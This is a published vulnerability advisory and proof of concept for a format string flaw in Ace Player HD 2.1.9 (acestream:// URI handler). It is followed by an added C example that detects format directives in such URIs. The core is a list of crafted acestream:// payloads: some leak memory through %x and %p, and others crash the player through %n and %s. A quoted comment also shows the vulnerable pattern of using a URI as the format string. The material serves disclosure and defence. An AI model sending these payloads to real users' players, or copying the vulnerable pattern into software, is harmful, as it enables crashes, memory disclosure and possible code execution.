ACE Stream Media 2.1 - (acestream://) Format String Exploit PoC
Source: http://www.zeroscience.mk Author: LiquidWorm Published: 2014-01-09
ACE Stream Media 2.1 (acestream://) Format String Exploit PoC
  
  
Vendor: ACE Stream
Product web page: http://www.acestream.org
Affected version: Ace Player HD 2.1.9 (VLC 2.0.5)
  
Summary: Ace Stream is an innovative multimedia platform of a new
generation, which includes different products and solutions for
ordinary Internet users as well as for professional members of the
multimedia market. Ace Stream uses in its core, P2P (peer-to-peer)
technology, BitTorrent protocol, which is acknowledged as the most
effective protocol to transfer/deliver 'heavy content'.
  
Desc: ACE Stream Media (Ace Player HD) is prone to a remote format
string vulnerability because the application fails to properly
sanitize user-supplied input through the URI using the 'acestream://'
protocol before including it in the format-specifier argument of
a formatted-printing function. A remote attacker may exploit this
issue to execute arbitrary code with the privileges of the user
running the affected application and/or cause memory address disclosure.
Failed exploit attempts may cause denial-of-service (DoS) conditions.
  
  
Tested on: Microsoft Windows 7 Professional SP1 (EN) 64bit
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
  
  
Advisory ID: ZSL-2014-5165
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5165.php
  
  
30.12.2013
  
--
  
  
format md:
  
acestream://AAAA%08x.%08x.%08x.%08x.%08x.AAAA
acestream://AAAA%08p.%08p.%08p.%08p.%08p.%08p.%08p.%08p.%08pAAAAA
acestream://AAAA%s
acestream://AAAA%s.AAAA%08x.%08x.%08x.%08x.AAAA
acestream://AAAA%08d
acestream://%i%i%i%i
acestream://%c%c%c%c
acestream://%f%f%f%f
acestream://AAAA%.8x.%.8p.%.8i.%.8d.%.8f.%.8s.%n.%08x.%08x.%08x.%08x.%08x.%08xAAAA
acestream://%15.10s.%15.10s
acestream://%8x%8x%8x%8x%8x%8x%8x%8x%8x
acestream://%0a%0d
acestream://%AA
acestream://%p%p%p%p%s
  
crashes:
  
acestream://AAAA%08s
acestream://AAAA%n
acestream://%08s
acestream://%p%p%p%p%s%n
acestream://%n
acestream://%s%s%s%s
acestream://AAAA%15.10s.%15.10s.%15.10s.%15.10s.%15.10s.%15.10sAAAA
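
An added example, not part of the original advisory and not the vendor's code: the hardened counterpart of the bug class in Desc, where the URI is only ever a data argument to a constant format, together with a scanner that counts printf conversion specifications in an 'acestream://' payload so a handler can log or reject it. The names count_format_directives and inspect_uri, the log layout and the benign sample ID are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>
#define SCHEME "acestream://"

/* Count printf-style conversion specifications in s; "%%" is a literal '%'.
 * Flags, width, precision and length modifiers are skipped, so "%08x" and
 * "%15.10s" each count once. */
int count_format_directives(const char *s)
{
    int n = 0;
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') { s++; continue; }
        const char *p = s + 1;
        while (*p && strchr("-+ #0123456789.*", *p)) p++;
        while (*p && strchr("hlLqjzt", *p)) p++;
        if (*p && strchr("diouxXeEfgGaAcspn", *p)) { n++; s = p; }
    }
    return n;
}

/* Returns -1 if uri is not an acestream:// URI, otherwise the number of
 * directives found in its payload. The log line is built with a constant
 * format and the URI as a data argument. The pattern the advisory describes
 * would instead be: snprintf(out, outlen, uri);  (URI used as the format) */
int inspect_uri(const char *uri, char *out, size_t outlen)
{
    size_t k = strlen(SCHEME);
    if (strncmp(uri, SCHEME, k) != 0)
        return -1;
    int hits = count_format_directives(uri + k);
    snprintf(out, outlen, "uri=%s directives=%d", uri, hits);
    return hits;
}

int main(void)
{
    const char *samples[] = {   /* constructed inputs */
        "acestream://AAAA%08x.%08x.%08x.%08x.%08x.AAAA",
        "acestream://%15.10s.%15.10s",
        "acestream://0123456789abcdef",
    };
    char line[256];
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        if (inspect_uri(samples[i], line, sizeof line) >= 0)
            puts(line);
    return 0;
}
```

Strings that look like URL percent-encoding, such as %0a%0d, are still counted, because a formatted-printing function would parse them as directives.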

 